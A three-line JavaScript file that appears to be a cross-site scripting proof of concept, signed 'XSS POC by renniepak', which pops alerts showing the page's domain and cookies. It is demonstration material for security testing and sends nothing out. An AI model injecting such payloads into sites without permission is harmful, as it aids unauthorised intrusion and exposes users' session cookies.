alert('XSS POC by renniepak');
alert(document.domain);
alert(document.cookie);
